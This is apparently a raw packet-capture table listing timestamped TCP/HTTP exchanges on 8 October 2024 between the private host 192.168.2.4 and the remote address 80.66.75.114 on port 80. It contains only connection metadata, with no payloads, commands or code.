                                                            Oct 8, 2024 10:08:41.136547089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136568069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136585951 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136600018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136615038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136634111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136650085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136667967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136682987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136703014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136718035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136751890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.224378109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.224587917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264668941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264714003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264751911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264780045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264780045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264810085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264843941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264858007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264858007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264878988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264890909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264913082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264946938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264949083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.264967918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.264981985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265008926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265018940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265043974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265072107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265075922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265105963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265130997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265160084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265160084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265196085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265217066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265228987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265254021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265281916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265286922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265317917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265337944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265353918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265377045 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265393019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265415907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265428066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265450954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265460968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265470982 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265496016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265510082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265531063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265549898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265590906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265718937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265770912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265794039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265806913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265814066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265856981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265856981 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265892982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265909910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265927076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265949011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265961885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.265971899 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.265995026 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266010046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266032934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266051054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266082048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266849041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266889095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.266901970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.266941071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403497934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403568983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403587103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403604031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403621912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403637886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403660059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403676033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403693914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403708935 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403748035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403765917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403798103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403815031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403832912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403855085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403872967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403893948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.403997898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404357910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404391050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404416084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404426098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404438019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404459000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.404479980 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.404494047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951664925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951668024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951683998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951703072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951716900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951885939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951900959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951919079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951922894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951936960 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.951939106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951955080 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.951968908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952088118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952131033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952202082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952215910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.952236891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.952251911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182379007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182398081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182414055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182429075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182432890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182445049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182459116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182459116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182460070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182475090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.182482004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182502985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.182513952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.224742889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.224839926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.224981070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.224994898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225008965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225024939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225034952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225039005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225054979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225054979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225070000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225081921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225085020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225100994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225105047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225116968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225125074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225145102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225157022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225208044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225253105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225334883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225351095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225364923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225383997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225405931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225450039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225492954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225522995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225538015 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225553036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225564957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225580931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225598097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225667953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225683928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225699902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225713968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225737095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225887060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225929022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.225954056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225970030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.225994110 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226006985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226066113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226080894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226094961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226106882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226109982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226130962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226150036 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226176977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226217985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226257086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226273060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226288080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226298094 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226301908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226310968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226317883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226325035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226339102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226350069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226351976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226389885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.226946115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226960897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226977110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.226986885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227000952 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227009058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227051020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227066040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227080107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227092028 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227096081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227109909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227123976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227137089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227284908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227299929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227313995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227324963 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227329016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227344036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.227349997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227370024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.227394104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.228744984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228760004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228774071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.228795052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.228811979 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229049921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229063034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229077101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229094982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.229100943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229118109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.229130983 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.272892952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272907019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272922039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272937059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.272974968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.273006916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.314117908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.314182997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.314219952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.314268112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556070089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556088924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556106091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556121111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556134939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556148052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556163073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556179047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556297064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556312084 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556304932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556328058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556344032 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556356907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556371927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556387901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556391954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556400061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556415081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556420088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556430101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556442976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556446075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556463003 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556479931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556499004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556685925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556700945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556715012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556727886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556741953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556747913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556754112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556768894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556768894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556782961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556787968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556794882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556807041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556808949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556827068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556843042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556863070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556874037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556888103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556917906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556926012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556932926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556946039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556960106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556967020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556974888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.556988001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.556989908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557004929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557007074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557019949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557034016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557049036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557049990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557049990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557065010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557077885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557080030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557079077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557095051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557097912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557111979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557122946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557122946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557142973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557161093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:42.557508945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557523966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:42.557538986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.103178024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.103246927 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:43.234724045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234777927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234812975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234847069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:43.234882116 CEST804973080.66.75.114192.168.2.4
